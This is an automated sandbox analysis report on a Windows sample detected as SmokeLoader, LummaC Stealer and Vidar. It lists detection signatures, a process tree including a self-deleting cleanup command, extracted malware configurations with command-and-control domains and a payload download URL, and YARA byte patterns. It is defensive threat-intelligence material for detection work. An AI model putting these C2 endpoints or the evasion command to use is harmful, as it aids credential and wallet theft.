Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4.exe

Overview

General Information

Sample name:4.exe
Analysis ID:1447651
MD5:73ddf9a7f42e0452b6aa00f4e0a0afd5
SHA1:79ea2d473e72751803c9650ae5c6b144a0aa4879
SHA256:c166b490846d441400727765dd668262087642bae1bbfd7aaf7a1bed5aa35b62
Tags:exe
Infos:

Detection

LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Opens network shares
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 4.exe (PID: 6960 cmdline: "C:\Users\user\Desktop\4.exe" MD5: 73DDF9A7F42E0452B6AA00F4E0A0AFD5)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • F441.exe (PID: 3192 cmdline: C:\Users\user\AppData\Local\Temp\F441.exe MD5: EA9DD1EAE2E521666D3F06382104EC10)
        • WerFault.exe (PID: 7056 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 1640 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • 9EDA.exe (PID: 2124 cmdline: C:\Users\user\AppData\Local\Temp\9EDA.exe MD5: 7BDE08F5DD2A433DAE25A8F8B3E70970)
        • kat796E.tmp (PID: 6620 cmdline: C:\Users\user\AppData\Local\Temp\kat796E.tmp MD5: 66064DBDB70A5EB15EBF3BF65ABA254B)
          • cmd.exe (PID: 4144 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat796E.tmp" & rd /s /q "C:\ProgramData\HJJJECFIECBG" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 5292 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • sdveeeu (PID: 1196 cmdline: C:\Users\user\AppData\Roaming\sdveeeu MD5: 73DDF9A7F42E0452B6AA00F4E0A0AFD5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x264:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        00000005.00000002.1997135222.0000000002E10000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
          • 0x664:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
          Click to see the 23 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          8.2.9EDA.exe.44d0000.2.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            8.2.9EDA.exe.44d0000.2.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
            • 0x221f0:$s1: JohnDoe
            • 0x221e8:$s2: HAL9TH
            8.2.9EDA.exe.4490000.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              8.2.9EDA.exe.4490000.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
              • 0x20df0:$s1: JohnDoe
              • 0x20de8:$s2: HAL9TH
              8.2.9EDA.exe.4267719.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                Click to see the 7 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\sdveeeu, CommandLine: C:\Users\user\AppData\Roaming\sdveeeu, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\sdveeeu, NewProcessName: C:\Users\user\AppData\Roaming\sdveeeu, OriginalFileName: C:\Users\user\AppData\Roaming\sdveeeu, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\sdveeeu, ProcessId: 1196, ProcessName: sdveeeu

                Snort Signatures

                Timestamp:05/26/24-10:22:33.956954
                SID:2052787
                Source Port:52163
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:58.715000
                SID:2039103
                Source Port:52746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:39.806023
                SID:2039103
                Source Port:52743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:25.599878
                SID:2039103
                Source Port:49738
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:24:23.638002
                SID:2039103
                Source Port:52694
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:03.657070
                SID:2039103
                Source Port:52737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:30.290385
                SID:2039103
                Source Port:49741
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:24:41.911621
                SID:2039103
                Source Port:52697
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:33.788541
                SID:2039103
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:59.723663
                SID:2039103
                Source Port:52656
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:24:47.097794
                SID:2039103
                Source Port:52698
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:24:28.877506
                SID:2039103
                Source Port:52695
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:22.040106
                SID:2039103
                Source Port:52740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:36.018013
                SID:2039103
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:23:03.796266
                SID:2039103
                Source Port:52658
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:24:58.756614
                SID:2039103
                Source Port:52736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:24:36.577364
                SID:2039103
                Source Port:52696
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:58.584278
                SID:2039103
                Source Port:52655
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:16.590426
                SID:2039103
                Source Port:52739
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:23.170190
                SID:2039103
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:52.705023
                SID:2039103
                Source Port:52745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:26.743766
                SID:2039103
                Source Port:49739
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:24:18.309650
                SID:2039103
                Source Port:52693
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:34.563116
                SID:2039103
                Source Port:52742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:11.186455
                SID:2039103
                Source Port:52738
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:28.089697
                SID:2039103
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:29.338724
                SID:2039103
                Source Port:52741
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:32.694240
                SID:2039103
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:34.953458
                SID:2039103
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:25:47.428708
                SID:2039103
                Source Port:52744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/26/24-10:22:24.295939
                SID:2039103
                Source Port:49737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: 4.exeAvira: detected
                Antivirus detection for URL or domain
                Source: whispedwoodmoodsksl.shopAvira URL Cloud: Label: malware
                Source: http://45.129.96.86/file/update.exeAvira URL Cloud: Label: malware
                Source: https://whispedwoodmoodsksl.shop/lAvira URL Cloud: Label: malware
                Source: https://whispedwoodmoodsksl.shop/aFXAvira URL Cloud: Label: malware
                Source: https://whispedwoodmoodsksl.shop/B9EAvira URL Cloud: Label: malware
                Source: holicisticscrarws.shopAvira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\sdveeeuAvira: detection malicious, Label: HEUR/AGEN.1311176
                Source: C:\Users\user\AppData\Local\Temp\F441.exeAvira: detection malicious, Label: TR/AVI.AceCrypter.javlp
                Found malware configuration
                Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
                Source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
                Source: F441.exe.3192.6.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}
                Multi AV Scanner detection for domain / URL
                Source: whispedwoodmoodsksl.shopVirustotal: Detection: 17%Perma Link
                Source: dbfhns.inVirustotal: Detection: 5%Perma Link
                Source: whispedwoodmoodsksl.shopVirustotal: Detection: 17%Perma Link
                Source: http://guteyr.cc/tmp/index.phpVirustotal: Detection: 12%Perma Link
                Source: https://65.109.242.59/fVirustotal: Detection: 12%Perma Link
                Source: http://45.129.96.86/file/update.exeVirustotal: Detection: 20%Perma Link
                Source: https://65.109.242.59Virustotal: Detection: 7%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\F441.exeReversingLabs: Detection: 95%
                Source: C:\Users\user\AppData\Roaming\sdveeeuReversingLabs: Detection: 39%
                Multi AV Scanner detection for submitted file
                Source: 4.exeReversingLabs: Detection: 39%
                Source: 4.exeVirustotal: Detection: 45%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\sdveeeuJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\F441.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: 4.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_0041537E CryptUnprotectData,6_2_0041537E
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFFA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,9_2_6CFFA9A0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFF44C0 PK11_PubEncrypt,9_2_6CFF44C0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0425B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,9_2_6D0425B0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFF4440 PK11_PrivDecrypt,9_2_6CFF4440
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFC4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,9_2_6CFC4420
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFDE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,9_2_6CFDE6E0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D01A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,9_2_6D01A730
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFD8670 PK11_ExportEncryptedPrivKeyInfo,9_2_6CFD8670
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFFA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,9_2_6CFFA650
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D020180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,9_2_6D020180
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFF43B0 PK11_PubEncryptPKCS1,PR_SetError,9_2_6CFF43B0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D01BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,9_2_6D01BD30
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D017C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,9_2_6D017C00
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFD7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,9_2_6CFD7D60
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFF3FF0 PK11_PrivDecryptPKCS1,9_2_6CFF3FF0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D019EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,9_2_6D019EC0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFF3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,9_2_6CFF3850
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFF9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,9_2_6CFF9840
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D01DA40 SEC_PKCS7ContentIsEncrypted,9_2_6D01DA40
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D027410 NSS_SecureMemcmp,PR_SetError,PK11_Decrypt,9_2_6D027410

                Compliance

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\AppData\Local\Temp\F441.exeUnpacked PE file: 6.2.F441.exe.400000.0.unpack
                Source: 4.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\4.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52653 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52659 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.4:52660 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52661 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.4:52662 version: TLS 1.2
                Source: Binary string: mozglue.pdbP source: kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
                Source: Binary string: freebl3.pdb source: freebl3.dll.9.dr
                Source: Binary string: freebl3.pdbp source: freebl3.dll.9.dr
                Source: Binary string: nss3.pdb@ source: kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
                Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.9.dr
                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.9.dr, vcruntime140.dll.9.dr
                Source: Binary string: nss3.pdb source: kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
                Source: Binary string: mozglue.pdb source: kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr
                Source: Binary string: softokn3.pdb source: softokn3[1].dll.9.dr
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
